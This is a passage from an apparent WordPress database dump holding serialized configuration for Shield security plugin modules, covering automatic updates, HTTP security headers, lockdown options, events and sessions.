on.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:14:{i:0;a:9:{s:3:\"key\";s:18:\"enable_autoupdates\";s:7:\"section\";s:55:\"section_enable_plugin_feature_automatic_updates_control\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/3w\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:24:\"Enable Automatic Updates\";s:7:\"summary\";s:48:\"Enable (or Disable) The Automatic Updates module\";s:11:\"description\";s:76:\"Un-Checking this option will completely disable the Automatic Updates module\";}i:1;a:9:{s:3:\"key\";s:29:\"enable_autoupdate_disable_all\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/3v\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"Disable All\";s:7:\"summary\";s:46:\"Completely Disable WordPress Automatic Updates\";s:11:\"description\";s:122:\"When selected, regardless of any other settings, all WordPress automatic updates on this site will be completely disabled!\";}i:2;a:10:{s:3:\"key\";s:15:\"autoupdate_core\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:10:\"core_minor\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:10:\"core_never\";s:4:\"text\";s:5:\"Never\";}i:1;a:2:{s:9:\"value_key\";s:10:\"core_minor\";s:4:\"text\";s:19:\"Minor Versions Only\";}i:2;a:2:{s:9:\"value_key\";s:10:\"core_major\";s:4:\"text\";s:24:\"Major and Minor Versions\";}}s:9:\"link_info\";s:18:\"https://icwp.io/3x\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"WordPress Core Updates\";s:7:\"summary\";s:66:\"Decide how the WordPress Core will automatically update, if at all\";s:11:\"description\";s:94:\"At least automatically upgrading minor versions is recommended (and is the WordPress default).\";}i:3;a:9:{s:3:\"key\";s:25:\"enable_autoupdate_plugins\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:7:\"Plugins\";s:7:\"summary\";s:28:\"Automatically Update Plugins\";s:11:\"description\";s:73:\"Note: Automatic updates for plugins are disabled on WordPress by default.\";}i:4;a:10:{s:3:\"key\";s:36:\"enable_individual_autoupdate_plugins\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:7:\"premium\";b:1;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:27:\"Individually Select Plugins\";s:7:\"summary\";s:49:\"Select Individual Plugins To Automatically Update\";s:11:\"description\";s:111:\"Turning this on will provide an option on the plugins page to select whether a plugin is automatically updated.\";}i:5;a:9:{s:3:\"key\";s:24:\"enable_autoupdate_themes\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:6:\"Themes\";s:7:\"summary\";s:27:\"Automatically Update Themes\";s:11:\"description\";s:72:\"Note: Automatic updates for themes are disabled on WordPress by default.\";}i:6;a:9:{s:3:\"key\";s:30:\"enable_autoupdate_translations\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Translations\";s:7:\"summary\";s:33:\"Automatically Update Translations\";s:11:\"description\";s:77:\"Note: Automatic updates for translations are enabled on WordPress by default.\";}i:7;a:9:{s:3:\"key\";s:28:\"enable_autoupdate_ignore_vcs\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Ignore Version Control\";s:7:\"summary\";s:50:\"Ignore Version Control Systems Such As GIT and SVN\";s:11:\"description\";s:168:\"If you use SVN or GIT and WordPress detects it, automatic updates are disabled by default. Check this box to ignore version control systems and allow automatic updates.\";}i:8;a:10:{s:3:\"key\";s:12:\"update_delay\";s:7:\"section\";s:15:\"section_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"0\";s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:18:\"https://icwp.io/e5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Update Delay\";s:7:\"summary\";s:47:\"Delay Automatic Updates For Period Of Stability\";s:11:\"description\";s:94:\"Shield will delay upgrades until the new update has been available for the set number of days.\";}i:9;a:10:{s:3:\"key\";s:22:\"autoupdate_plugin_self\";s:7:\"section\";s:15:\"section_options\";s:7:\"default\";s:4:\"auto\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:4:\"auto\";s:4:\"text\";s:21:\"Let The Plugin Decide\";}i:1;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:2;a:2:{s:9:\"value_key\";s:9:\"immediate\";s:4:\"text\";s:19:\"As Soon As Possible\";}}s:9:\"link_info\";s:18:\"https://icwp.io/3x\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"WordPress Core Updates\";s:7:\"summary\";s:66:\"Decide how the WordPress Core will automatically update, if at all\";s:11:\"description\";s:94:\"At least automatically upgrading minor versions is recommended (and is the WordPress default).\";}i:10;a:9:{s:3:\"key\";s:33:\"enable_upgrade_notification_email\";s:7:\"section\";s:15:\"section_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Send Report Email\";s:7:\"summary\";s:42:\"Send email notices after automatic updates\";s:11:\"description\";s:81:\"You can turn on/off email notices from automatic updates by un/checking this box.\";}i:11;a:10:{s:3:\"key\";s:22:\"override_email_address\";s:7:\"section\";s:15:\"section_options\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Report Email Address\";s:7:\"summary\";s:42:\"Where to send upgrade notification reports\";s:11:\"description\";s:65:\"If this is empty, it will default to the Site Admin email address\";}i:12;a:6:{s:3:\"key\";s:14:\"delay_tracking\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:13;a:5:{s:3:\"key\";s:16:\"selected_plugins\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:1:{s:20:\"action_hook_priority\";i:1000;}s:10:\"meta_modts\";i:1572181753;}'),(33634,1,'shield_mod_config_222e7b189dff320d74752393e58875f0','a:5:{s:4:\"slug\";s:7:\"headers\";s:10:\"properties\";a:13:{s:4:\"slug\";s:7:\"headers\";s:4:\"name\";s:12:\"HTTP Headers\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:7:\"headers\";s:7:\"tagline\";s:29:\"Control HTTP Security Headers\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:80;}s:8:\"sections\";a:4:{i:0;a:5:{s:4:\"slug\";s:24:\"section_security_headers\";s:7:\"primary\";b:1;s:5:\"title\";s:25:\"Advanced Security Headers\";s:11:\"title_short\";s:16:\"Security Headers\";s:7:\"summary\";a:2:{i:0;s:92:\"Purpose - Protect visitors to your site by implementing increased security response headers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:1;a:4:{s:4:\"slug\";s:31:\"section_content_security_policy\";s:5:\"title\";s:23:\"Content Security Policy\";s:11:\"title_short\";s:23:\"Content Security Policy\";s:7:\"summary\";a:2:{i:0;s:105:\"Purpose - Restrict the sources and types of content that may be loaded and processed by visitor browsers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:2;a:4:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_headers\";s:5:\"title\";s:27:\"Enable Module: HTTP Headers\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:92:\"Purpose - Protect visitors to your site by implementing increased security response headers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:12:{i:0;a:9:{s:3:\"key\";s:14:\"enable_headers\";s:7:\"section\";s:37:\"section_enable_plugin_feature_headers\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/aj\";s:9:\"link_blog\";s:18:\"https://icwp.io/7c\";s:4:\"name\";s:19:\"Enable HTTP Headers\";s:7:\"summary\";s:43:\"Enable (or Disable) The HTTP Headers module\";s:11:\"description\";s:71:\"Un-Checking this option will completely disable the HTTP Headers module\";}i:1;a:10:{s:3:\"key\";s:7:\"x_frame\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:13:\"on_sameorigin\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:3:\"off\";s:4:\"text\";s:24:\"Off: iFrames Not Blocked\";}i:1;a:2:{s:9:\"value_key\";s:13:\"on_sameorigin\";s:4:\"text\";s:36:\"On: Allow iFrames On The Same Domain\";}i:2;a:2:{s:9:\"value_key\";s:7:\"on_deny\";s:4:\"text\";s:21:\"On: Block All iFrames\";}}s:9:\"link_info\";s:18:\"https://icwp.io/78\";s:9:\"link_blog\";s:18:\"https://icwp.io/7c\";s:4:\"name\";s:13:\"Block iFrames\";s:7:\"summary\";s:33:\"Block Remote iFrames Of This Site\";s:11:\"description\";s:139:\"The setting prevents any external website from embedding your site in an iFrame. This is useful for preventing so-called ClickJack attacks.\";}i:2;a:9:{s:3:\"key\";s:13:\"x_xss_protect\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/79\";s:9:\"link_blog\";s:18:\"https://icwp.io/7c\";s:4:\"name\";s:14:\"XSS Protection\";s:7:\"summary\";s:38:\"Employ Built-In Browser XSS Protection\";s:11:\"description\";s:80:\"Directs compatible browsers to block what they detect as Reflective XSS attacks.\";}i:3;a:9:{s:3:\"key\";s:14:\"x_content_type\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/7a\";s:9:\"link_blog\";s:18:\"https://icwp.io/7c\";s:4:\"name\";s:18:\"Prevent Mime-Sniff\";s:7:\"summary\";s:27:\"Turn-Off Browser Mime-Sniff\";s:11:\"description\";s:60:\"Reduces visitor exposure to malicious user-uploaded content.\";}i:4;a:11:{s:3:\"key\";s:17:\"x_referrer_policy\";s:7:\"section\";s:24:\"section_security_headers\";s:9:\"sensitive\";b:0;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:10:\"unsafe-url\";s:13:\"value_options\";a:10:{i:0;a:2:{s:9:\"value_key\";s:10:\"unsafe-url\";s:4:\"text\";s:45:\"Default: Full Referrer URL (aka \'Unsafe URL\')\";}i:1;a:2:{s:9:\"value_key\";s:11:\"no-referrer\";s:4:\"text\";s:11:\"No Referrer\";}i:2;a:2:{s:9:\"value_key\";s:26:\"no-referrer-when-downgrade\";s:4:\"text\";s:26:\"No Referrer When Downgrade\";}i:3;a:2:{s:9:\"value_key\";s:11:\"same-origin\";s:4:\"text\";s:11:\"Same Origin\";}i:4;a:2:{s:9:\"value_key\";s:6:\"origin\";s:4:\"text\";s:6:\"Origin\";}i:5;a:2:{s:9:\"value_key\";s:13:\"strict-origin\";s:4:\"text\";s:13:\"Strict Origin\";}i:6;a:2:{s:9:\"value_key\";s:24:\"origin-when-cross-origin\";s:4:\"text\";s:24:\"Origin When Cross-Origin\";}i:7;a:2:{s:9:\"value_key\";s:31:\"strict-origin-when-cross-origin\";s:4:\"text\";s:31:\"Strict Origin When Cross-Origin\";}i:8;a:2:{s:9:\"value_key\";s:5:\"empty\";s:4:\"text\";s:12:\"Empty Header\";}i:9;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:33:\"Disabled - Don\'t Send This Header\";}}s:9:\"link_info\";s:18:\"https://icwp.io/a5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Referrer Policy\";s:7:\"summary\";s:22:\"Referrer Policy Header\";s:11:\"description\";s:141:\"The Referrer Policy Header allows you to control when and what referral information a browser may pass along with links clicked on your site.\";}i:5;a:9:{s:3:\"key\";s:32:\"enable_x_content_security_policy\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/7d\";s:9:\"link_blog\";s:18:\"https://icwp.io/7c\";s:4:\"name\";s:30:\"Enable Content Security Policy\";s:7:\"summary\";s:54:\"Enable (or Disable) The Content Security Policy module\";s:11:\"description\";s:75:\"Allows for permission and restriction of all resources loaded on your site.\";}i:6;a:9:{s:3:\"key\";s:9:\"xcsp_self\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:4:\"Self\";s:7:\"summary\";s:22:\"Allow \'self\' Directive\";s:11:\"description\";s:117:\"Using \'self\' is generally recommended. It essentially means that resources from your own host:protocol are permitted.\";}i:7;a:9:{s:3:\"key\";s:11:\"xcsp_inline\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Inline Entities\";s:7:\"summary\";s:28:\"Allow Inline Scripts and CSS\";s:11:\"description\";s:76:\"Allows parsing of Javascript and CSS declared in-line in your html document.\";}i:8;a:9:{s:3:\"key\";s:9:\"xcsp_data\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"Embedded Data\";s:7:\"summary\";s:24:\"Allow \'data:\' Directives\";s:11:\"description\";s:80:\"Allows use of embedded data directives, most commonly used for images and fonts.\";}i:9;a:9:{s:3:\"key\";s:9:\"xcsp_eval\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Allow eval()\";s:7:\"summary\";s:23:\"Allow Javascript eval()\";s:11:\"description\";s:50:\"Permits the use of Javascript the eval() function.\";}i:10;a:9:{s:3:\"key\";s:10:\"xcsp_https\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:5:\"HTTPS\";s:7:\"summary\";s:22:\"HTTPS Resource Loading\";s:11:\"description\";s:50:\"Allows loading of any content provided over HTTPS.\";}i:11;a:10:{s:3:\"key\";s:10:\"xcsp_hosts\";s:7:\"section\";s:31:\"section_content_security_policy\";s:9:\"sensitive\";b:1;s:7:\"default\";a:1:{i:0;s:1:\"*\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Permitted Hosts\";s:7:\"summary\";s:27:\"Permitted Hosts and Domains\";s:11:\"description\";s:276:\"You can explicitly state which hosts/domain from which content may be loaded. Take great care and test your site as you may block legitimate resources. If in-doubt, leave blank or use \'*\' only. Note: You can force only HTTPS for a given domain by prefixing it with \'https://\'.\";}}s:10:\"meta_modts\";i:1572181749;}'),(33635,1,'shield_mod_config_29746021ff7ab0b0f5987907649c5618','a:6:{s:4:\"slug\";s:8:\"lockdown\";s:10:\"properties\";a:13:{s:4:\"slug\";s:8:\"lockdown\";s:4:\"name\";s:11:\"WP Lockdown\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:8:\"lockdown\";s:7:\"tagline\";s:56:\"Harden the more loosely controlled settings of your site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:90;}s:8:\"sections\";a:5:{i:0;a:5:{s:4:\"slug\";s:14:\"section_apixml\";s:7:\"primary\";b:1;s:5:\"title\";s:25:\"WordPress System Lockdown\";s:11:\"title_short\";s:6:\"System\";s:7:\"summary\";a:2:{i:0;s:58:\"Purpose - Lockdown certain core WordPress system features.\";i:1;s:99:\"Recommendation - This depends on your usage and needs for certain WordPress functions and features.\";}}i:1;a:4:{s:4:\"slug\";s:33:\"section_permission_access_options\";s:5:\"title\";s:30:\"Permissions and Access Options\";s:11:\"title_short\";s:11:\"Permissions\";s:7:\"summary\";a:2:{i:0;s:66:\"Purpose - Provides finer control of certain WordPress permissions.\";i:1;s:75:\"Recommendation - Only enable SSL if you have a valid certificate installed.\";}}i:2;a:4:{s:4:\"slug\";s:35:\"section_wordpress_obscurity_options\";s:5:\"title\";s:27:\"WordPress Obscurity Options\";s:11:\"title_short\";s:9:\"Obscurity\";s:7:\"summary\";a:2:{i:0;s:63:\"Purpose - Obscures certain WordPress settings from public view.\";i:1;s:103:\"Recommendation - Obscurity is not true security and so these settings are down to your personal tastes.\";}}i:3;a:4:{s:4:\"slug\";s:48:\"section_enable_plugin_feature_wordpress_lockdown\";s:5:\"title\";s:23:\"Enable Module: Lockdown\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Lockdown helps secure-up certain loosely-controlled WordPress settings on your site.\";i:1;s:53:\"Recommendation - Keep the Lockdown feature turned on.\";}}i:4;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:9:{i:0;a:9:{s:3:\"key\";s:15:\"enable_lockdown\";s:7:\"section\";s:48:\"section_enable_plugin_feature_wordpress_lockdown\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/4r\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Enable Lockdown\";s:7:\"summary\";s:39:\"Enable (or Disable) The Lockdown module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Lockdown module\";}i:1;a:9:{s:3:\"key\";s:14:\"disable_xmlrpc\";s:7:\"section\";s:14:\"section_apixml\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/e6\";s:9:\"link_blog\";s:18:\"https://icwp.io/fb\";s:4:\"name\";s:15:\"Disable XML-RPC\";s:7:\"summary\";s:26:\"Disable The XML-RPC System\";s:11:\"description\";s:71:\"Checking this option will completely turn off the whole XML-RPC system.\";}i:2;a:9:{s:3:\"key\";s:25:\"disable_anonymous_restapi\";s:7:\"section\";s:14:\"section_apixml\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"Anonymous Rest API\";s:7:\"summary\";s:30:\"Disable The Anonymous Rest API\";s:11:\"description\";s:82:\"Checking this option will completely turn off the whole Anonymous Rest API system.\";}i:3;a:9:{s:3:\"key\";s:24:\"api_namespace_exclusions\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";a:3:{i:0;s:14:\"contact-form-7\";i:1;s:7:\"jetpack\";i:2;s:11:\"woocommerce\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Rest API Exclusions\";s:7:\"summary\";s:29:\"Anonymous REST API Exclusions\";s:11:\"description\";s:81:\"Any namespaces provided here will be excluded from the Anonymous API restriction.\";}i:4;a:9:{s:3:\"key\";s:20:\"disable_file_editing\";s:7:\"section\";s:33:\"section_permission_access_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/4q\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Disable File Editing\";s:7:\"summary\";s:51:\"Disable Ability To Edit Files From Within WordPress\";s:11:\"description\";s:135:\"Removes the option to directly edit any files from within the WordPress admin area. Equivalent to setting \'DISALLOW_FILE_EDIT\' to TRUE.\";}i:5;a:9:{s:3:\"key\";s:15:\"force_ssl_admin\";s:7:\"section\";s:33:\"section_permission_access_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/4t\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Force SSL Admin\";s:7:\"summary\";s:57:\"Forces WordPress Admin Dashboard To Be Delivered Over SSL\";s:11:\"description\";s:126:\"Please only enable this option if you have a valid SSL certificate installed. Equivalent to setting \'FORCE_SSL_ADMIN\' to TRUE.\";}i:6;a:9:{s:3:\"key\";s:22:\"mask_wordpress_version\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/43\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Mask WordPress Version\";s:7:\"summary\";s:49:\"Prevents Public Display Of Your WordPress Version\";s:11:\"description\";s:194:\"Enter how you would like your WordPress version displayed publicly. Leave blank to disable this feature. Warning: This may interfere with WordPress plugins that rely on the $wp_version variable.\";}i:7;a:9:{s:3:\"key\";s:28:\"hide_wordpress_generator_tag\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"WP Generator Tag\";s:7:\"summary\";s:28:\"Remove WP Generator Meta Tag\";s:11:\"description\";s:119:\"Remove a meta tag from your WordPress pages that publicly displays that your site is WordPress and its current version.\";}i:8;a:9:{s:3:\"key\";s:22:\"block_author_discovery\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:22:\"https://icwp.io/wpsf23\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Block Username Fishing\";s:7:\"summary\";s:69:\"Block the ability to discover WordPress usernames based on author IDs\";s:11:\"description\";s:150:\"When enabled, any URL requests containing \'author=\' will be killed. Warning: Enabling this option may interfere with expected operations of your site.\";}}s:11:\"definitions\";a:2:{s:26:\"default_restapi_exclusions\";a:5:{i:0;s:14:\"contact-form-7\";i:1;s:7:\"jetpack\";i:2;s:3:\"tho\";i:3;s:12:\"wpstatistics\";i:4;s:11:\"woocommerce\";}s:6:\"events\";a:2:{s:23:\"block_anonymous_restapi\";a:1:{s:6:\"recent\";b:1;}s:9:\"block_xml\";a:3:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1572181753;}'),(33636,1,'shield_mod_config_8c4ba8ec608c5a0f2a7eb75cc3acbc10','a:5:{s:10:\"properties\";a:11:{s:4:\"slug\";s:6:\"events\";s:4:\"name\";s:6:\"Events\";s:21:\"show_module_menu_item\";b:0;s:11:\"storage_key\";s:6:\"events\";s:7:\"tagline\";s:37:\"Collection of plugin events and stats\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;}s:8:\"sections\";a:2:{i:0;a:5:{s:4:\"slug\";s:36:\"section_enable_plugin_feature_events\";s:7:\"primary\";b:1;s:5:\"title\";s:21:\"Enable Module: Events\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:70:\"Purpose - Helps you see at a glance how effective the plugin has been.\";i:1;s:55:\"Recommendation - Keep the Statistics feature turned on.\";}}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:1:{i:0;a:9:{s:3:\"key\";s:13:\"enable_events\";s:7:\"section\";s:36:\"section_enable_plugin_feature_events\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"Enable Events\";s:7:\"summary\";s:41:\"Enable (or Disable) The Statistics module\";s:11:\"description\";s:69:\"Un-Checking this option will completely disable the Statistics module\";}}s:11:\"definitions\";a:3:{s:10:\"db_classes\";a:1:{s:6:\"events\";s:65:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Events\\Handler\";}s:17:\"events_table_name\";s:6:\"events\";s:20:\"events_table_columns\";a:5:{i:0;s:2:\"id\";i:1;s:5:\"event\";i:2;s:5:\"count\";i:3;s:10:\"created_at\";i:4;s:10:\"deleted_at\";}}s:10:\"meta_modts\";i:1572181749;}'),(33637,1,'shield_mod_config_070fb0edfbb36e92a4ff17e3570b3481','a:5:{s:10:\"properties\";a:13:{s:4:\"slug\";s:8:\"sessions\";s:4:\"name\";s:8:\"Sessions\";s:21:\"show_module_menu_item\";b:0;s:11:\"storage_key\";s:8:\"sessions\";s:7:\"tagline\";s:13:\"User Sessions\";s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:19:\"auto_load_processor\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;}s:8:\"sections\";a:2:{i:0;a:5:{s:4:\"slug\";s:38:\"section_enable_plugin_feature_sessions\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Enable Module: Sessions\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:44:\"Purpose - Creates and Manages User Sessions.\";i:1;s:53:\"Recommendation - Keep the Sessions feature turned on.\";}}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:2:{i:0;a:9:{s:3:\"key\";s:15:\"enable_sessions\";s:7:\"section\";s:38:\"section_enable_plugin_feature_sessions\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Enable Sessions\";s:7:\"summary\";s:39:\"Enable (or Disable) The Sessions module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Sessions module\";}i:1;a:5:{s:3:\"key\";s:27:\"autoadd_sessions_started_at\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:12:\"transferable\";b:0;s:7:\"default\";i:0;}}s:11:\"definitions\";a:4:{s:10:\"db_classes\";a:1:{s:7:\"session\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Session\\Handler\";}s:19:\"sessions_table_name\";s:8:\"sessions\";s:22:\"sessions_table_columns\";a:13:{i:0;s:2:\"id\";i:1;s:10:\"session_id\";i:2;s:11:\"wp_username\";i:3;s:2:\"ip\";i:4;s:7:\"browser\";i:5;s:12:\"logged_in_at\";i:6;s:16:\"last_activity_at\";i:7;s:17:\"last_activity_uri\";i:8;s:13:\"li_code_email\";i:9;s:23:\"login_intent_expires_at\";i:10;s:11:\"secadmin_at\";i:11;s:10:\"created_at\";i:12;s:10:\"deleted_at\";}s:6:\"events\";a:2:{s:13:\"session_start\";a:1:{s:5:\"audit\";b:0;}s:17:\"session_terminate\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}}}s:10:\"meta_modts\";i:1572181749;}'),(33638,1,'shield_mod_config_e288a3842cfdcfac1c9e75b452bd0169','a:6:{s:4:\"slug\";s:11:\"audit_trail\";s:10:\"properties\";a:13:{s:4:\"slug\";s:11:\"audit_